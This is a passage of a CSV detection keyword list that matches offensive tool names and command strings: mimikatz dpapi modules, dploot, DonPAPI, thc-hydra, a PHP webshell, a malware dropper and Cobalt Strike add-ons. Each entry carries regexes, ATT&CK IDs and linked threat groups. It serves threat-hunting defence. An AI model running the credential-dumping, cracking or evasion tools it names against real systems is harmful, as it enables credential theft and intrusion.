keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41516" "*dpapi::tpm*",".{0,1000}dpapi\:\:tpm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41517" "*dpapi::vault*",".{0,1000}dpapi\:\:vault.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41518" "*dpapi::wifi*",".{0,1000}dpapi\:\:wifi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41519" "*dpapi::wwman*",".{0,1000}dpapi\:\:wwman.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41520" "*dpapi_dump*",".{0,1000}dpapi_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41521" "*dpapi_dump_*.txt*",".{0,1000}dpapi_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","41522" "*dpapi_pick/credhist.py*",".{0,1000}dpapi_pick\/credhist\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41523" "*DPAPImk2john.py*",".{0,1000}DPAPImk2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41524" "*dpl4hydra *",".{0,1000}dpl4hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41525" "*dpl4hydra.sh*",".{0,1000}dpl4hydra\.sh.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41526" "*dpl4hydra_*.csv*",".{0,1000}dpl4hydra_.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41527" "*dpl4hydra_*.tmp*",".{0,1000}dpl4hydra_.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41528" "*dpl4hydra_linksys*",".{0,1000}dpl4hydra_linksys.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","41529" "*dploot -*",".{0,1000}dploot\s\-.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41530" "*dploot sccm -d*",".{0,1000}dploot\ssccm\s\-d.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41531" "*dploot*backupkey*",".{0,1000}dploot.{0,1000}backupkey.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41532" 
"*dploot*browser*",".{0,1000}dploot.{0,1000}browser.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41533" "*dploot*certificates*",".{0,1000}dploot.{0,1000}certificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41534" "*dploot*credentials*",".{0,1000}dploot.{0,1000}credentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41535" "*dploot*machinecertificates*",".{0,1000}dploot.{0,1000}machinecertificates.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41536" "*dploot*machinecredentials*",".{0,1000}dploot.{0,1000}machinecredentials.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41537" "*dploot*machinemasterkeys*",".{0,1000}dploot.{0,1000}machinemasterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - 
T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41538" "*dploot*machinevaults*",".{0,1000}dploot.{0,1000}machinevaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41539" "*dploot*masterkeys*",".{0,1000}dploot.{0,1000}masterkeys.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41540" "*dploot*vaults*",".{0,1000}dploot.{0,1000}vaults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41541" "*dploot*wifi*",".{0,1000}dploot.{0,1000}wifi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41542" "*dploot.lib.dpapi*",".{0,1000}dploot\.lib\.dpapi.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41543" 
"*dploot.lib.smb*",".{0,1000}dploot\.lib\.smb.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41544" "*dploot.triage.*",".{0,1000}dploot\.triage\..{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41545" "*dploot.triage.sccm import SCCMTriage*",".{0,1000}dploot\.triage\.sccm\simport\sSCCMTriage.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41546" "*dploot/releases/download/*/dploot*",".{0,1000}dploot\/releases\/download\/.{0,1000}\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41547" "*dploot_linux_adm64*",".{0,1000}dploot_linux_adm64.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","#linux","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41548" "*dploot-main.zip*",".{0,1000}dploot\-main\.zip.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - 
TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41549" "*DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd*",".{0,1000}DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","41551" "*DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI*",".{0,1000}DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","41552" "*dr0op/CrossNet*",".{0,1000}dr0op\/CrossNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","41553" "*Dr0p1t-Framework*",".{0,1000}Dr0p1t\-Framework.{0,1000}","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? 
In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","N/A","10","1409","377","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z","41554" "*dr4k0nia/NixImports*",".{0,1000}dr4k0nia\/NixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","41555" "*DragonCastle - @TheXC3LL*",".{0,1000}DragonCastle\s\-\s\@TheXC3LL.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41556" "*DragonCastle.dll*",".{0,1000}DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41557" "*dragoncastle.py -*",".{0,1000}dragoncastle\.py\s\-.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - 
TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41558" "*DReverseProxy.git*",".{0,1000}DReverseProxy\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","41559" 
"*DReverseServer.go*",".{0,1000}DReverseServer\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","41560" "*drgreenthumb93/CVE-2022-30190-follina*",".{0,1000}drgreenthumb93\/CVE\-2022\-30190\-follina.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","41561" "*DriverQuery.exe no-msft*",".{0,1000}DriverQuery\.exe\sno\-msft.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41562" "*drk1wi/Modlishka*",".{0,1000}drk1wi\/Modlishka.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - 